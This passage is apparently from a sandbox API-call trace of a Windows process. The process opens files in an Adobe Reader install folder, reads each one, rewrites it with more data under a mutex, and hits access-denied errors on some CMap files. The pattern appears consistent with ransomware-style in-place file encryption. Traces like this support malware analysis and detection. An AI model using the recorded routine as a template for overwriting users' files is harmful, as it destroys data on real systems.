lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_super.gif", cchWideChar=15, lpMultiByteStr=0x1f733cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="forms_super.gif", lpUsedDefaultChar=0x0) returned 15 [0082.205] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x345f2bc*=0x228, lpOverlapped=0x0) returned 1 [0082.206] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.207] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x345f2d0*=0x7b0, lpOverlapped=0x0) returned 1 [0082.207] CloseHandle (hObject=0x1e4) returned 1 [0082.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_sent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.210] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.210] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x38d [0082.210] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.210] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.211] ReleaseMutex (hMutex=0x168) returned 1 [0082.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_sent.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_sent.gif", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reviews_sent.gif", lpUsedDefaultChar=0x0) returned 16 [0082.211] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x38d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x345f2bc*=0x38d, lpOverlapped=0x0) returned 1 [0082.676] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.682] WriteFile (in: hFile=0x1d8, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x915, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x915, lpOverlapped=0x0) returned 1 [0082.688] CloseHandle (hObject=0x1d8) returned 1 [0082.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_lg.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.174] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.174] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4e7 [0083.179] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.179] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.185] ReleaseMutex (hMutex=0x168) returned 1 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_lg.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_lg.gif", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="server_lg.gif", lpUsedDefaultChar=0x0) returned 13 [0083.188] ReadFile (in: hFile=0x204, lpBuffer=0x1f3c368, nNumberOfBytesToRead=0x4e7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3c368*, lpNumberOfBytesRead=0x345f2bc*=0x4e7, lpOverlapped=0x0) returned 1 [0083.195] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0083.195] WriteFile (in: hFile=0x204, lpBuffer=0x1ea9ee8*, nNumberOfBytesToWrite=0xa6f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ee8*, lpNumberOfBytesWritten=0x345f2d0*=0xa6f, lpOverlapped=0x0) returned 1 [0083.195] CloseHandle (hObject=0x204) returned 1 [0083.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationintray.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.198] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.198] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3e3 [0083.198] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.198] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.199] ReleaseMutex (hMutex=0x168) returned 1 [0083.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOffNotificationInTray.gif", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0083.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOffNotificationInTray.gif", cchWideChar=29, lpMultiByteStr=0x1f8fbdc, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="turnOffNotificationInTray.gif", lpUsedDefaultChar=0x0) returned 29 [0083.199] ReadFile (in: hFile=0x204, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3e3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x3e3, lpOverlapped=0x0) returned 1 [0083.205] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0083.205] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x96b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x96b, lpOverlapped=0x0) returned 1 [0083.206] CloseHandle (hObject=0x204) returned 1 [0083.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.207] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.207] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4623 [0083.208] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.208] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.208] ReleaseMutex (hMutex=0x168) returned 1 [0083.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCZE.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCZE.htm", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeCZE.htm", lpUsedDefaultChar=0x0) returned 13 [0083.208] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.210] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3623 [0083.210] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.211] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3623 [0083.211] WriteFile (in: hFile=0x204, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.211] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0083.211] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.211] CloseHandle (hObject=0x204) returned 1 [0083.212] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.212] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.212] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x43b7 [0083.213] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.213] ReleaseMutex (hMutex=0x168) returned 1 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeSKY.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeSKY.htm", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeSKY.htm", lpUsedDefaultChar=0x0) returned 13 [0083.213] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.215] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x33b7 [0083.215] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.216] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x33b7 [0083.216] WriteFile (in: hFile=0x204, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.216] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0083.216] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.217] CloseHandle (hObject=0x204) returned 1 [0083.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.218] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.218] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x53e91c [0083.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0083.219] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.219] ReleaseMutex (hMutex=0x168) returned 1 [0083.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KozGoPr6N-Medium.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KozGoPr6N-Medium.otf", cchWideChar=20, lpMultiByteStr=0x1f88a64, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KozGoPr6N-Medium.otf", lpUsedDefaultChar=0x0) returned 20 [0083.219] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.221] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.223] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0083.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x53c91c [0083.225] ReadFile (in: hFile=0x204, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0083.229] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x53c91c [0083.230] WriteFile (in: hFile=0x204, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x345f28c*=0x2588, lpOverlapped=0x0) returned 1 [0083.230] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0083.230] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.232] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.232] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x2000, lpOverlapped=0x0) returned 1 [0083.232] CloseHandle (hObject=0x204) returned 1 [0083.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H", lpFilePart=0x345f690*="90pv-RKSJ-H") returned 0x42 [0083.784] GetLastError () returned 0x5 [0083.784] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0083.785] LocalFree (hMem=0x69e2b0) returned 0x0 [0083.785] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0083.785] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0083.786] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0083.786] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0083.786] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-h")) returned 0x20 [0083.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.942] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3", lpFilePart=0x345f690*="Adobe-CNS1-3") returned 0x43 [0083.943] GetLastError () returned 0x5 [0083.943] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0083.948] LocalFree (hMem=0x69e2b0) returned 0x0 [0083.948] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0083.949] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0083.951] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0083.952] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0083.952] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-3")) returned 0x20 [0083.952] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.227] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2", lpFilePart=0x345f690*="Adobe-CNS1-UCS2") returned 0x46 [0084.227] GetLastError () returned 0x5 [0084.227] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0084.230] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.230] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.230] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0084.231] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.231] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.231] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-ucs2")) returned 0x20 [0084.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbpc-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.232] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC", lpFilePart=0x345f690*="Adobe-GB1-GBpc-EUC") returned 0x49 [0084.232] GetLastError () returned 0x5 [0084.232] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0084.232] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.232] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.232] 